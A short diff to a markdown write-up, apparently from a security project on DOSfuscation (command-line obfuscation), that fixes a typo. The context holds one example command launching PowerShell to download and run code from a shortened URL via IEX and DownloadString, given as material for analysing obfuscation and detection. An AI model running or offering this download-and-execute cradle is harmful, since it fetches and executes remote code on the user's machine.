zinint/OSCD_Invoke-DOSfuscation/OSCD - Issue - DOSfuscation.md

 #### Environment Variable Substrings

-Here is a PowerShell command, that we will use as as example:
+Here is a PowerShell command, that we will use as an example:

 ```CMD
 cmd.exe /c “powershell.exe IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/L3g1t’)”